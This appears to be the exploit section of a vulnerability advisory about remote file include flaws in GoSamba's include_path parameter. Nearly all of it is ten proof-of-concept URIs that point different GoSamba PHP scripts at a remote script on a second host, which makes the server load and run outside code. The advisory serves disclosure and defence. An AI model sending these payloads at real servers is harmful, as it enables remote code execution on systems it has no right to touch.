• info
• discussion
• exploit
• solution
• references

GoSamba Include_Path Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/inc_group.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_manager.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_newgroup.php.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_smb_conf.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/inc_user.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/main.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/HTML_oben.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/inc_freigabe.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/inc_freigabe1.php?include_path=http://www.example2.com/scripts/020.txt?
http://www.example.com/include/inc_freigabe3.php?include_path=http://www.example2.com/scripts/020.txt?